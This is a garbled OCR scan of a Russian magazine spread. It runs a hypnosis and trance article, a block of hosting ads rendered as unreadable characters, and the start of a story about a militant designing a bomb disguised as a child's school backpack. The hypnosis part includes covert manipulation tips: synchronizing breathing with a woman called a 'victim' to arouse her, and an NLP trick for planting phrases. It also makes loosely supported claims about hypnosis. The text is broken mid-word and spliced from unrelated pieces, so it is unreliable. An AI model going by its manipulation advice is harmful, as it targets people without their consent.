мываются, факты из разных источников ни разу не стыкуются друг с другом, и чем глубже 
погружаешься в проблему, тем больше убеждаешься, что. . . среднестатистический психолог 
разбирается в гипнозе ничуть не лучше, чем свинья в апельсинах. Но мы-то с тобой хакеры, 
а не философы! Применив к гипнозу систематический подход, мы не только выясним, чем 
же он является на самом деле, но с огромным удивлением обнаружим, что попадаем под его 
воздействие чуть ли не по несколько раз в день! 



абрав в Гугле «гипноз», мы немедленно получим в ответ 
кучу ссылок на тренинги и книги по НЛП, медитации и 
магии. Последние целиком состоят изтруднопроверяемых 
фактов и практически нереализуемыхтехник, разбавленных 
небольшим количеством самоочевидных примеров, которые нетребуют 
доказательств (по типу того, как при глубоком вдохе у сидящего человека 
появляется едва уловимая легкость в руках, вызываемая расширением 



грудной клетки, на которое в обычной жизни мы не обращаем внимания 
также, как на тиканье часов, но стоиттолько нам на нихуказать, какчасы 
затикают в полный рост). 

Книги и тренинги «Как заработать миллион долларов» изтой же серии. 
Очевидно, что человек, владеющей техникой гипноза, будет зарабаты- 
вать именно на гипнозе и делиться этой техникой с окружающими ему 
не резон — зачем плодить конкурентов? Естественно, кроме корысти 
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существуетеще и стремление кобщественному признанию, 
так что серьезные книги по гипнозу все-таки выходят... пе- 
риодически. Однако, как и любые книги по психологии, они 
в значительной степени подвержены авторитарности, то 
есть опираются на умозаключения их создателей, зачастую 
граничащие со схоластикой. 

Научный подход и логические рассуждения, естественно, 
не являются единственной практикой. Помимо них сущес- 
твуют и эмпирические данные, и чувственный опыт. Все 
мы испытываем боль, впадаем в сон, но объяснить физику 
передачи нервных импульсов или ответить на вопрос: что 
конкретно необходимо сделать, чтобы заснуть (без лошади- 
ной дозы снотворного), не может ни наука, ни кто-либо из 
читателей. Тем не менее смерть отбессонницы — явление 
достаточно редкое, можно даже сказать, исключительное. 
Вероятно, у каждого из нас есть свои собственные методы 
засыпания, которые мы нащупываем чисто интуитивно, так 
же как, например, при обучении удержанию равновесия во 
время езды на велосипеде. Это и есть пример чувственного 
опыта, который невозможно передать словами, но описать 
последовательность действий, приводящую кзаданному 
результату, можно! 

Научиться гипнозу (втом числе и самогипнозу, также назы- 
ваемому аутотренингом) может практически каждый (прав- 
да, стоит ли этого делать — другой вопрос). Мыщъх будет 
говорить только о легкопроверяемых фактах и описывать 
легковоспроизводимые техники, не требующие длительной 
начальной подготовки. 

г ЧТО ЕСТЬ ГИПНОЗ? 

«Гипноз — это одно из измененных состояний сознания», 

— пишут многие авторы, распространяя зловещую вонь 
политкорректности. Почему бы нам тогда по аналогии с 
«сексуальным меньшинством» не ввести в обиход термин 
«интеллектуальное большинство»? «Измененное состояние 
сознания» — это просто раскрученный бренд. Это псевдо- 
научный термин, создающий иллюзию, что с гипнозом все 
понятно, когда с ним ничего не понятно. Существует куча 
гипотез, объясняющих, что же такое гипноз, и существует 
еще больше видов самого гипноза, объединяющих под од- 
ной «торговой маркой» различные состояния сознания, что 
делает невозможным построение «единой теории гипноза». 
Достаточно распространено утверждение, что в состоянии 
гипноза отмечаются изменения бета-волн головного мозга, 
что (якобы) подтверждается методами электроэнцефа- 
лографии. Однако справочники по самой электроэнцефа- 
лографии ничего подобного не упоминают. Да, есть такие 
бета-волны, частота которых находится в диапазоне от 1 2 
до 30 Гц и которые характерны для активной физической 
и/или умственной деятельности, а их ритмичные колебания 
свидетельствуют о том, что человек под кайфом или всерьез 
не дружит с крышей. Какую именно форму принимают 
бета-волны при гипнозе, никто не в курсе. Зато изтехже 
справочников по электроэнцефалографии можноузнать, 
что существуют еще и тета-волны с частотой от 4 до 7 Гц, 
характерные для сна, релаксации и медитации. О гипнозе 
опять ни слова. Короче, сплошной разброд и шатание фак- 
тов. Мыщъх перерыл кучу литературы, но так и не встретил 
ни одного упоминания о факте снятия электроэнцефалог- 
раммы под гипнозом и совершенно не представляет, какона 
могла бы выглядеть. 

Будем исходить из того, что гипноз является разновидно- 
стью транса (от французского Ігапвіг — «оцепенеть») — пол- 
ной концентрации внимания на внутреннем или внешнем 
раздражителе, при которой степень критичности оценки 
обрабатываемой сознанием информации значительно 




Позиция для медитации 



снижается. Попросту говоря, сознание заглатывает все, что 
бы ему ни скормили, не подвергая перевариваемую пищу 
рациональному анализу. В состоянии транса внушаемость 
человека (втом числе и самовнушаемость) значительно 
повышается. 

Загипнотизированный субъект сконцентрирован на вну- 
шениях гипнотизера. В этом, собственно говоря, и состоит 
сущность гипноза: погружение человека втранс с после- 
дующим внушением. Естественно, возможно погружение 
человека втранс без внушения, равно как и внушение без 
транса. Если человек от природы легко внушаем, доверчив 
или малограмотен, то он уже предрасположен к некритиче- 
ской оценке информации, а потому может быть «загипноти- 
зирован» и без погружения втранс. Гипнотизеру достаточно 
вызватьу него доверие. 

Лечебная сила гипноза является разновидностью эффекта 
плацебо, то есть исцеления за счет веры больного во 
врача/экстрасенса/лекарство. Эффект плацебо настолько 
распространен, что при всяком серьезном испытании ново- 
го лекарства больных делят на две группы, одной из которых 
вместо лекарства дают «пустышку», а затем смотрят на 
результат: если в обеих группах результат совпадает, пре- 
парат выбрасывают на помойку, ну или на прилавок... Давно 
замечено, что среди препаратов с идентичным активным 
веществом, приготовленных по идентичным технологиям, 
побеждает... торговая марка и эффективность препарата 
определяется не только его химическим составом, но еще 
и рекламой. Внешний вид табл етоктоже играет роль. Чем 
«серьезнее» они выглядят, тем сильнее эффект, и многие 
фармацевтические компании активно используют это 
обстоятельство. 

Каку гипноза, так и у плацебо есть границы применимости, 
и если болезнь не можетбыть излечена за счет мобили- 
зации внутренних сил организма, никакой гипноз тут не 
поможет. А лучше всего подобным образом лечатся болез- 
ни, связанные с психическими расстройствами, к которым 
относятся нетолько проблемы крыши, но и, например, 
некоторые сердечные заболевания, поскольку деятель- 
ность сердца завязана на нервную систему. Переживание, 
стресс — инфаркт. 

г ЧТОЕСТЫРАНС? 

Транс — это одно из состояний психики, ассоциируемое с 
гипнозом, медитацией и... да! С расширением сознания, 
которого, оказывается, можно достичь посредством самого 
сознания, без всяких там химикалий типа наркотиков и про- 
чих психотропных веществ, как отпускаемых в аптеке без 



I 

> ѵѵагпіпд 

Согласно «Инструк- 
ции по применению 
гипноза» от 30 
декабря 1 924 года, 
применение гипноза 
разрешается только 
с лечебной целью и 
только врачами-спе- 
циалистами. Забав- 
но, но это древнее 
положение в силе 
до сих пор, а потому 
за гипноз реально 
схлопотать по шее 
независимо оттого, 
давал ли «подопыт- 
ный кролик» свое 
согласие на опыты 
или нет. Даже нота- 
риально заверенная 
бумага не прокатит, 
если ты не врач и 
цели отличаются от 
лечебных. 



I 

> ІП^О 

Гипноз — погру- 
жение человека в 
транс, осуществ- 
ляемое при помощи 
воздействия на 
него монотонных 
раздражителей, 
медикаментозных 
препаратов или 
другими способами. 
В состоянии гипноза 
часто осуществляет- 
ся внушение. 

Плацебо — физио- 
логически инертное 
вещество, исполь- 
зуемое в качестве 
лекарственного 
средства, положи- 
тельный лечебный 
эффект которого 
связан с подсозна- 
тельным психологи- 
ческим ожиданием 
пациента. 
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«Втыкаем» в зеркало, впадая втранс 



рецепта, так и запрещенных. Экспериментировать со своим сознанием, 
в самом деле, очень интересно. Тем более что, помимо «ловли» кайфа (а 
транс — довольно приятное состояние) и галлюцинаций, можно «прочис- 
тить» мозги, решить различные психические проблемы, активизировать 
умственную деятельность или, наоборот, снять напряжение, впав в 
нирвану релаксации. 

Естественно, такие эксперименты потенциально небезопасны, особенно 
если их проводить бездумно, не зная меры. Существует риск впасть в 
очень глубокий транс, выйти из которого без помощи специалиста уже 
не удастся. Однако даже людям, легко входящим в транс, требуются годы 
упорныхтренировок, чтобы достичьтой глубины, из которой уже можно 
и не вернуться. Так что времени для чтения литературы психонавту отпу- 
щено достаточно, благо читать есть что: медитация, йога, аутотренинг... 
Практически вселюди впадают втранс по нескольку раз вдень. Допус- 
тим, беседуем мы с приятелем и вдруг замечаем, что он перестает реа- 
гировать на нас и как бы «зависает», уставившись, скажем, на складку 
обоев на стене. Его взгляд не блуждает (каку всех нормальных людей), 
и лицо становится практически полностью симметричным (правый по- 
луовал губ совпадете левым). Короче, наш товарищ в трансе, откуда его 
может вывести хороший щелбан или просто отклик: «Вася, ты сейчас тут 
или вообще где?!». Тут Вася встряхивается и говорит: «Прости, задумал- 
ся». Вот это и есть транс. 

Научиться впадать втранс по собственному желанию можно, но никакие 
книги тут не помогут. Предварительно необходимо научиться фиксиро- 
вать состояния спонтанного транса и усиливать их. Умение вызывать 
подобные состояния приходит позднее. 

^ ВПАДАЕМ В ТРАНС И ВЫПА- 
ДАЕМ ОТТУДА 

Некоторые люди, скажем торговцы, 
бессознательно развивают в себе 
способность вводить покупателя 
в транс, в котором он становится 
намного более внушаемым и тогда 
вместе с чайным сервизом готов 
прикупить, например, архинужный 
коврик для пупырчатого слоника. 

Налицо применение гипноза (а это 
именно гипноз и есть!) в немеди- 



цинских целях, что формально преследуется по закону, но неформально 

— абсолютно невозможно доказать. 

Развивая в себе способность самостоятельного погружения втранс, 
человек становится намного более уязвимым, но вместе стем умение 
распознавать состояниетранса позволяетлегко оттуда выходить, напри- 
мер, просто встряхнувшись отусов до хвоста. Короче, кто предупрежден 

— тот вооружен. Атеперь о конкретных методиках. 

Наверное, все видели маятник, который раскачивает гипнотизер 
перед пациентом, но немногие догадываются об его истинном 
назначении. Проведем простой эксперимент. Берем зеркало и, 
пристально глядя себе в глаза, начинаем говорить вслухлюбую 
заранее неподготовленную речь, типа: «Сейчас зима, на улице 
холодно и стремно, дороги посыпаны солью, в магазинах исчез 
портвейн, в ванной капает кран, у оператора мобильной связи 
опять глючит биллинг». Но только не циклимся: «Сейчас зима, 
сейчас зима, сейчас зима...». Довольно интересный эффект, да? 
Чем дольше нам удается сохранять способность говорить, тем 
тяжелее нас ввести в транс, что свидетельствует о превосходстве 
нашего рационального мышления над инстинктами. 

Хорошо. Проведем другой эксперимент. На этот раз с двигательным 
аппаратом. Попробуем выполнять какие-нибудь действия, например 
выписывать замысловатые фигуры ногами или руками, и параллельно с 
этим говорить. Эффектаналогичен! 

Сосредоточившись на маятнике, пациент действительно впадает в 
транс. Фактически то же самое происходит, когда мы смотрим на себя в 
зеркало и пытаемся говорить. Только в первом случае наш взгляд «при- 
вязан» к маятнику, а во втором — к нам самим. Речь не есть средство вхо- 
ждения в транс. Это что-то вроде датчика, сообщающего нам, находимся 
ли мы в трансе или еще нет. Для вхождения в транс достаточно просто 
смотреть на маятник или в зеркало, глядя себе прямо в глаза. 

Тут (разуж мы находимся втрансе и открыты для внушения), казалось бы, 
можно включить магнитофонную запись стекстом аутогенной трениров- 
ки и погрузить сознание в речь диктора, усилив ее влияние в несколько 
раз... Включить, конечно, можно, только эффект будет практически 
нулевой, поскольку мы «втыкаем» в маятник. Слова елозят по ушам, 
скользят вдоль сознания, но внутрь не проникают. Какуже говорилось 
выше, в состоянии гипноза субъект сосредоточен на словах гипноти- 
зера, а в состоянии медитации — на своих внутренних переживаниях. 
Соответственно, аутотренинг предполагает концентрацию внимания на 
магнитофонной записи (если она есть) или на своих собственных словах, 
но никак не на зеркале. 

Да, конечно, в состоянии транса человек воспринимает полученную 
информацию некритически, и потому если заготовить запись вида: «Вася, 
тебе сейчас оченьхорошо! Вася, ты ловишь реальный кайф!», то, прокру- 
чивая ее в состоянии транса, в который легко впасть с помощью зеркала, 
мы можем снять депрессию. Ну... хотя бы на время пребывания втрансе :). 
Главное — называть себя по имени. Фразы «Мне хорошо» и «Тебе хорошо» 
практически тождественны обобщенному утверждению «Эх, хорошо!». А 
вот когда человека называютпо имени, это усиливает мощность внушения 
в несколько раз, поскольку на личные местоимения отклика юте я толь ко 
верхние слои сознания, а на имя — намного более глубинные. 

Любые ритмичные раздражители — постукивание, вспышки света 
и т.д. — также способствуют входу в транс, конечно, если на них 
сосредоточено внимание (тикающие часы никого в транс не вводят). 



Бета- и тета-волны головного мозга 
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Про маятник помним, да? Но маятник — это беспонтовый прибор без 
обратной связи. А вотесли, например, постукивать карандашом в 
такт дыханию человека, а затем плавно менять темп, то... дыхание че- 
ловека также изменится, чем можно пользоваться при пикапе. Даже 
без карандаша. Выбираем себе жертву и начинаем дышать ей в такт 
(естественно, чтобы определить на глаз темп дыхания другого чело- 
века, требуется наблюдательность и некоторая практика). Ускоряя 
свое дыхание, мы ускоряем и ее (жертвы), передавая ей часть нашего 
возбуждения, что легко заметить по покраснению щек «пациентки». 
Ага, действует! Конечно, само по себе это не заставит девушку бро- 
ситься на нашего эрегированного хомячка, но, скорее всего, побудит 
ее к поиску причины внезапного возбуждения, и одной из сознатель- 
ных и рациональных интерпретаций может оказаться мысль, что это 
связано «вон с тем красивым молодым человеком». (Примечание 
редактора: здесь нельзя не вспомнить одну из интересных и дейс- 
твенных техник НЛП — выполнение перекрестного отзеркаливания 
после достижения аттракции, которая состоит в том, что манипулятор 
начинает говорить ключевые фразы на выдохе жертвы, тогда у пос- 
ледней может возникнуть иллюзия своей внутренней речи, то есть 
как будто эти слова она хотела сказать сама). 

О выходе из транса. Из неглубокого транса (а в глубокий транс без тре- 
нировки впасть весьма проблематично, если, конечно, утебя не очень 
тонкий слой сознания) человека выводят, в частности, резкие звуки, 
особенно те, на которые он привык откликаться. Например, звонок теле- 
фона, будильника и т.д. 

Напоследок — простое упражнение для «прочистки» мозгов. Достаточно 
в течение -5 минут вслух нести полную околесицу, типа «ум панде харе 
оп ли кика мазепа упеду», чтобы устроить в голове такой сквозняк, что 
вентиляция отдыхает. Мозги заняты генерацией словесного мусора, и на 
остальные мысли «вычислительных» ресурсов уже не остается; главное 
опять-таки не зацикливаться. Этот прием помогает прогнать всякие 
дурные мысли, от которых трудно избавиться. 

Кстати говоря, известно, что есть грибы в плохом настроении не стоит, 
иначе бэд-трип нам обеспечен. Воттакточно не стоит входить втранс, 
концентрируясь на своих внутренних переживаниях, в состоянии 
депрессии, иначе плохие мысли рискуют вступить в такой резонанс, что 
крышу разнесет на части. Внушаемость (и самовнушаемость) в трансе 
повышается, и если начать говорить себе (или думать), какой я бедный 
и несчастный, то действительно станет плохо, ну и, соответственно, 
наоборот. 



ки.чплшш ііі м ілі ліи .г ія влс с.іі^укминё ус.ш і 



костинг 

I М\ шиши : 




Птзны 


ЛарамтрЬ* 


и«н* 


Видіпімг 


ІГО. 2 Ііііі 2 ЫуЪОІ Мь 




Виіс 


гг». ІннгсжіМуЗиіВві 


От НЯ ЗИ» 


9и»ігиі« Рто 


ІГ» ѢОдаНтж 


От 521 руй І 


1 і ■ ■ ..ч- ч іі и і;і ш'іПі 


Ішмелі. ѴПМіеіекни ІЧРгппііЩ'.т 



9 ВИРТУАЛЬНЫЕ 

ВЫДЕЛЕННЫЕ ВЕРНЕРЫ: 



іПплны 

5ІІМЙІІ 

ЙиаігооЕ-о, 

Виііги*а Рто 



ПірэиотрЫ 

2Г-Е, т там. кгоь 
йГВ. 12ЗДАЫЗДМ, ССОЫрлфМЬ 
гэга іншпам воапрлф.*. 
!ІГС ІКІ'ВВЛМ 12ОДЬтдоме 



Дпіінктііэнг.ц.арп и |.| іі[к и:м :іі-и 

кліг.іе.- управленіи* І'ЙГіііизііііі.й - ЙЧІ рѵіл исл: 

*■ ЛлЙ ІЩ. ГИИ ІГП іі І' /ГІ цщгі. и ІЩЩ 





ІМ1Г 



К' ігпкил и |'ім|ігіі. і, .і ■ііиѵіі грлі.іі:и 

при йіи ргсіа 6 чсе. №іі|иі 10%. 
іірн іі іі.-ті гс и ] I им скн.гка И%. 



* РЕГИСТРАЦИЯ ДОМЕНОВ 



1» рі і ітс г ря ішкі цОПі^нии 

.сот , .пеі, .Ыг, ,огд 

нсею .Чй рл ГТ/і о.!. ак.ін)‘ііік НДС 




В ЛЕГЕНДЫ И МИФЫ ДРЕВНЕЙ ГРЕЦИИ 

На человека можно воздействоватьтолько в рамках системы его веро- 
ваний, и потому в состоянии гипноза его нельзя заставить сделать то, 
что противоречитего внутренним моральным устоям. Иначе говоря, в 
гипнозе человек делаетто, что сделал бы и без него, только в гипнозе это 
делается более охотно. 

Естественно, систему моральных ценностей человека можно 
изменять, но для этого требуется время, и одного-двух сеансов тут 
будет явно недостаточно. С другой стороны, для изменения системы 
ценностей гипноз необязателен. Так что не стоит преувеличивать 
его возможности. 

Человека под гипнозом невозможно «запрограммировать» на преступ- 
ление, в состоянии гипноза нельзя изнасиловать девушку, еслитолько 
она сама того не захочет (а вот когда «и хочется, и колется», гипноз, 
разумеется, упрощает пикап, но это уже не изнасилование, а соблазне- 
ние получается). 

Гипнотизер не может стереть память или неприятные воспоминания 
(правда, он может изменить к ним отношение человека, чтобы они 
воспринимались не так остро и болезненно). Также после выхода 
из транса воздействие прекращается, и «запрограммировать» 
человека на какое-то действие после выхода из гипнотического 
состояния невозможно. То есть, можно, конечно. Путем внушения. 
Если действие не противоречит его убеждениям. Но совершать 
его человек будетуже осознанно (при условии, что вообще будет 
совершать), цц 
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мар никогда не любил компьютеры. Вспоминал курсы с ужасом 
— проклятый ноутбук с глянцевым экраном пугал его больше, 
чем рюкзак, наполненный под самую шнуровку пластидом. Он, 
конечно же, посещал занятия — не та ситуация, чтобы увили- 
вать. Не школа, в общем. Тут все было серьезнее. Не пришел — пулю в лоб. 

В лагере боевиков он был на хорошем счету, но в целом не особенно 
выделялся среди других — общий уровень подготовки был достаточно 
высоким, практически все имели за спиной боевой опыт. Кто-то воевал 
уже не первый год, а кто-то совершил всего пару мелких операций в горах, 
но все заглянули смерти в глаза, все были помечены кровью. Никто ничем 
не гордился, никто не рвался в старшие — авторитеты появлялись сами; 
уважение ктем, кто более зрел и опытен, было закономерным явлением. 
Когда их всех делили на несколько групп, Умар выбрал привычное для себя 
подрывное дело. Это не означало, что он теперь будет заниматься только 
минами, взрывчаткой и изобретением все новых и новых способов прятать 
свои страшные, начиненные смертью устройства. Его никто не освобождал 
от стрельбы, физической подготовки, но он очень надеялся, что сумеет 
избежать компьютерной подготовки. 

Не удалось — и это несмотря на то, что для компьютерного обеспече- 
ния и шпионажа в группе было отобрано несколько ребятс неплохим 
образованием и опытом. Но именно эти люди потребовали от коман- 
дира лагеря, чтобы с ноутбуками познакомились все, хотя бы в объеме 
«включил- вы ключ ил». 

— Неизвестно, куда нас занесет, — говорил старший компьютерной 
группы. — Идет война, и любого из нас могут убить. Нужно будет прийти на 
помощь. Компьютеры держатсвязь через спутники с нашими руководите- 
лями, с нашим Центром. Мы получаем оттуда инструкции, благословления 
и необходимую информацию — политическую, техническую, финансовую. 



Даже та кую вещь, как прогноз погоды, — даже это мы узнаем при помощи 
компьютера. Знаете, как говорят неверные? «На бога надейся, а сам не 
плошай». Аллах поможеттому, кто готов к любым испытаниям. Поэтому 
один раз в неделю все группы пройдутчерез мои занятия. У нас есть при- 
мерно три месяца, чтобы основательно подготовиться... 

Его слушали очень внимательно. Всем было интересно узнать, когда же 
станут платить настоящие деньги? Когда они смогут начать боевые опера- 
ции? Срок втри месяца вызвал у некоторых негативную реакцию — послы- 
шалось несколько выкриков из строя: «Долго! Сколько можно!» Командир 
прищурил глаза и нервно щелкнул пальцами — негромко, но все услышали 
и тутже замолчали. 

— Мы сильны не только потому, что наша война — святая, — сказал он, 
обращаясь ко всем сразу и к каждому в отдельности. — Наша сила — в 
дисциплине и высокой разносторонней готовности. В этом лагере сейчас 
находятся самые надежные, самые смелые воины. И хотя не все еще 
отмечены шрамами, каждому из вас я доверяю как самому себе. Затри 
месяца, которые отведены нам для подготовки, мы должны превратить- 
ся в команду, способную выполнить любое задание Центра, вплоть до 
самого сложного. Выполнить несмотря ни на что или умереть. Помните, 
вы уже давно все в раю. Остался лишь шаг. Сделайте его так, чтобы земля 
содрогнулась. 

Тишина, которой все встретили его последние слова, давила на уши. Умар 
краем глаза следил за своими товарищами — все фанатично смотрели на 
командира, сжимая до белизны в пальцах автоматы... 

Послетакой пламенной речи ниу кого не осталось ни малейшего сомнения 
в целесообразности любой подготовки. Из леса периодически доносились 
автоматные очереди, звучали глухие взрывы — полигон работал на всю 
катушку. Два раза в неделю прилетал вертолет, и лагерь получал новую 
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партию патронов, гранат, взрывчатки, расходуя ее с фантастической ско- 
ростью. Стрелятьумели все, и не просто стрелять, а стрелять очень и очень 
хорошо. Помехой не были нитемнота, нитуман, ни дождь... 

Группа подрывников непрерывно изобретала. Все они трудились над тем, 
чтобы разработать нечто новое, ранее не существовавшее. Они думали, 
подо что можно замаскировать их смертоносные изделия, изобретали 
взрыватели, конструировали новые, более мощные бомбы. В ход шли и 
инструкции из Центра, и их собственные мозги. Боевики, выбравшие своим 
бизнесом минную войну, обладали каким-то жутким воображением, созда- 
вая все более страшные взрывные устройства. 

Умар очень хотел отличиться. Он был человеком здесь новым, достаточ- 
но опытным, но по большому счету ничем не выделяющимся из общей 
массы. За плечами у него было уже два рейда к пограничным поселкам, 
несколько умело поставленных растяжек (на одной из них — это он точно 
знал — подорвался офицер, командир разведгруппы, человеке огромным 
опытом, воевавшим в горах ажс конца девяностых; и отэтогоУмар считал 
себя очень перспективным бойцом: если уж такой опытный спецназовец не 
сумел обойти его ловушку, то...). Командир группы подрывников чувство- 
вал в нем неплохой потенциал и периодически выделял его, ставя другим 
в пример. Но просто хорошо собирать мины по схемам, полученным из 
Центра, — это одно, а изобрести нечто новое и достаточно универсальное 
— это совсем другое. 

И Умар думал. Он подолгу сидел в одиночестве, рисуя на земле одному 
ему понятные схемы, но не пропуская молитвы и занятия по смежным 
военным специальностям. Стрелял он довольно сносно, караульную службу 
нес прилежно, физическая подготовка была на очень высоком уровне. 
Единственное, где он был далеко не первым, — это на уроках компьютерной 
грамотности. 

Преподавал им европеец, что уже само по себе отталкивалоУмара от 
занятий. Он не любил всех, кто не принадлежал к миру ислама подуху; он 
не понимал тех, кто приезжаетсюда за какие-то деньги, не вникая в смысл 
священной войны. Не понимал и не принимал, но приказ превыше всего. 

Он старался прятаться за спинами своих друзей, но этот парень, которого 
надо было называть просто Джон, видел даже сквозь широкие спины. Он 
вызывал к себе каждого из группы, показывал какие-то элементарные 
вещи, начиная стого, что объяснял принципиальное назначение ноутбука, 
аккуратно намекая на то, что у компьютера имеются существенные отличия 
отавтомата Калашникова. 

Умар чувствовал, что Джон смеется над ними, но далеко не все воспри- 
нималиуроки европейца с американским именем какиздевку. Многие 
не скрывали своего страха перед тонким куском железа и пластмассы с 
открывающейся крышкой; нажимая кнопку включения, они ожидали если 
не взрыва, то по крайней мере удара током. Огромные мозолистые руки 
боевиков успели сломать пару клавиатур на ноутбуках, прежде чем Джон 
понял, что эти парни приспособлены к работе на компьютерах та к же, какой 
сам к ползанью по горам на брюхе. 

Тогда он посоветовался с командиром лагеря — и они вместе приняли 
решение отом, что кзанятиям с компьютером будут допущены наиболее 
перспективные. Из большого отряда в этотограниченный контингент попа- 
ло около двадцати пяти человек, Джон поделил их на три группы, исходя из 
каких-то своих соображений. Умара втом, первом, списке не было. 

Когда в дальнем углу лагеря, рядом с зарытым в землю бездымным генера- 
тором сидели, поджав по себя ноги, бородачи сультрапортативными ноут- 
буками, Умар не могемотреть на это без смеха. Некоторые водили пальцами 
по экрану, другие периодически подзывали Джона для разрешения воз- 
никших вопросов. Судя по всему, наставникучил ихтому, как обращаться с 
навигационными системами, с интернетом, что в целом не было для Умара 
большим секретом, но взять в руки навигатор или попытаться получить 
электронную почту было для него чересчур сложной задачей. Вот взрывчат- 
ка — это былото, что нужно. Никакого обмана. Пластид, взрыватели, шнуры, 
маскировка, простые и радиодетонаторы, возможность активации взрыва 
по звонку сотового телефона, по сигналу противоугонной сигнализации и 
много чего еще — тутУмар был едва ли не самым продвинутым. Он чувст- 
вовал, что в состоянии придумать что-то свое — такое, что потом попадет в 
инструкции Центра и будет передаваться другим отрядам, как его опыт. 

И он придумал. 



Рисунки на земле принесли свои плоды. Умар долго думал; он вспоминал 
то, как работали боевики из других отрядов, о которых он слышал от коман- 
диров. Он вспоминал своихучителей, которые пытались раскрепостить его 
сознание, которые открыли емутайну взрыва, идеологию боя, философию 
бомбы... Он думал, как сапер, чувствовал, кактонкая струна растяжки, жил, 
словно в головети кал таймер. И все это нашло выход — он создал бомбу, 
которую не видел нигде. Бомбу, замаскированную под школьный рюкзак. 
Правда, поначалу он использовал за неимением школьного обыкновенный 
армейский. Декорация получилась не оченьудачная, поскольку полезная 
масса болталасьтам, словно в вакууме. Затем у командира он заказал 
школьную сумку и несколько школьныхучебников. Тотособенно не спра- 
шивал, тем более что заграница исполняла все их просьбы, даже самые 
невероятные и безумные. Просто вписал в заявку — и все. В Центре знали: 
их подопечные ничего не делаютзря. 

И три вертолета спустя Умар получил сразу несколько рюкзаков. Они 
отличались и по размеру, и по количеству карманов, и по расцветке; внутри 
каждого были вложены абсолютно идентичные наборы учебников. Умар 
рассмотрел рюкзаки очень внимательно, подержал в руках, заглянул внутрь 
каждого, оценивая вместительность, и остановился на черном, с эмблемой 
Человека-паука. Учебники были тоже внимательно им изучены, взвешены 
на ладони — вроде бы все подходило для решения поставленной задачи... 
Он так и не понял, что же привлекло этого вездесущего Джона, но когда он 
рассматривал новое приобретение, европеец неожиданным образом ока- 
зался рядом. Он положил руку боевику на плечо и спросил по-английски: 

— Собрался в школу? 

Умар замер с раскрытым учебником в руках. Его сердце бешено билось, но 
он старался ничем не выдать своего испуга этой внезапности. Выдержав 
паузу, он ответил: 

— Я похож на первоклассника? 

— Нет. Но и учебники не для первого класса. 

Умар, конечно, знал английский, еще с самых первыхтренировочных ла- 
герей. Там без этого было никак: или ты все понимаешь, или подорвешься, 
не поняв инструкции. Но здесь и сейчас он не хотел демонстрировать свое 
владение языком в полной мере, хотя послать этого любопытного компью- 
терщика куда подальше надо было бы. 

— Ты прав. Учебники разные. Но мне нужны именнотакие. Дело не втом, 
для какого они класса. Дело втолщине книг. 

— Ты любишь читать толстые детские книги? 

Умар не понимал, что хочет Джон. Да он и не хотел понимать — он уже 
размышлял надтем, как распределить внутри рюкзака взрывчаткутаким 
образом, чтобы, открыв рюкзак, нельзя было сразу определить ее наличие. 

— Нет, я не люблю читать. Я вообще не люблю читать. Меня интересуют в 
этой жизни только Коран и инструкции по взрывному делу. 

— Тогда зачем тебе книги и школьные портфели? — неунимался Джон. 

— Не портфели, а рюкзаки, —уточнил Умар, чутьне добавив пару слов для 
большего понимания, но сдержался. 

Джон кивнул и усмехнулся. 

— Надумал бомбу сделать для начальной школы? 

— Для любой, — огрызнулся Умар и тутже пожалел о сказанном. Он 
не хотел раньше времени раскрывать кому бы то ни было цель своих 
экспериментов. 

— Не думаю, что ты сможешь сделать из этого тайну, Умар, — Джон увидел 
замешательство боевика и похлопал его по плечу. — Ну бомба. Подумаешь. 
Не первая и не последняя. Хочешь выделиться? Или дал клятву забрать с 
собой как можно больше неверных? 

— Я пока умирать не собираюсь... — огрызнулся Умар, вместо того чтобы 
сказать привычную в таких ситуациях фразу: «На все воля Аллаха». — Есть 
война. Есть враг. Есть приказ. Тебе ли это не знать, уважаемый? 

Джон согласно кивнул, разглядывая сложенные у дерева рюкзаки. 

— Все именнотак, какты сказал, — подтвердил он. — Просто я не могу себе 
представитьтвоего врага, Умар. Он очень похож на школьника и потому 
никакие кажется мне опасным. Неужели ты придумал себе какого-то нового 
врага — маленького, с рюкзаком за спиной? Я думаю, ни один шахид не 
отправитсвоего сына с этим грузом в школу. 

— Что ты хочешь сказать? — Умар положил учебник в рюкзаки повесил его 
себе на плечо. 
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— Всего лишь хочу предостеречыебя от неудачи, — Джон развел руками. 

— Бомба у тебя наверняка получится, но вот будет л и она кому-нибудь нуж- 
на? Кто доставит ее к цели? Подумай... 

Умар повернулся к Джону спиной и до хруста сжал кулаки. 

— Я обязательно подумаю, уважаемый. Атеперь я хочу побыть один, мне 
надо поговорить с богом. 

Джон хотел что-то ответить, но не нашел нужных слов — только молча кив- 
нул и ушел в свою палатку. И если бы кто-нибудь слышал его в эту минуту, то 
он удивился бы тому, что этот человек шепчет себе поднос: 

— Зрісіеггпап... Зрісіегтап... Зрісіегтап... 

А на следующее утро Умар был приказом командира зачислен в одну из 
групп компьютерной подготовки кДжону. 

— Я хочу помочьтебе, — сказал европеец, когда удивленный и возмущен- 
ный Умар пришел на занятия. — Давай отойдем... 

Ониуединились неподалеку, присев на поваленное дерево. 

— Я хочу научить тебя рассчитывать свои изделия на компьютере, — Джон 
скрестил руки на груди и внимательно посмотрел на Умара. — Ты, конеч- 
ноже, не первый раз собираешь свои смертоносные изделия и уверен в 
каждом своем движении, в каждом куске пластида. Но компьютер дасттебе 
такую точность, с которой не сравнится даже твоя хваленая интуиция и 
опыт. Ты сможешь рассчитать все до грамма и быть уверенным в направле- 
нии взрыва, в радиусе разлета осколков. Ты сможешь определить все это, 
используя спутниковые карты той местности, где ты собираешься приме- 
нить взрывчатку. Насколько тебя привлекаеттакая перспектива? 

— Не думаю, что хотел бы заниматься этим сам, — отрицательно покачал 
головой Умар. — Хотите помочь — помогите. Не думаю, что вы сумеете за 
короткий срок обучить меня настолько, что я смогу сделать все правильно. А 
ошибок в моей работе не должно быть, их потом очень сложно исправлять. 

— Я готов заниматься с тобой индивидуально, — Джон встал с дерева и 
выбрал место напротив Умара. — Даже несмотря на то, что нагрузка у меня 
приличная. 

— Она иу меня не меньше вашего, —усмехнулся боевик. — Время появ- 
ляется только вечером... Или в караулах, когда точноуверен в напарнике, 
рисую на земле, думаю... 

— Мы сделаем стобой супербомбу, — не обращая внимания на слова 
Умара, перебил его Джон. — Я уже размышлял над этим весь вечер после 
разговора стобой, посмотрел, что есть на моей машине — я уверен, у нас 
получится. Ты создаешь примерную модель, я рассчитываю ее, ты можешь 
вносить любые коррективы — компьютер пересчитает все очень быстро. Но 

— мне не дает покоя этот рюкзак. Может, стоит поискать более практичный 
форм-фактор для бомбы? 

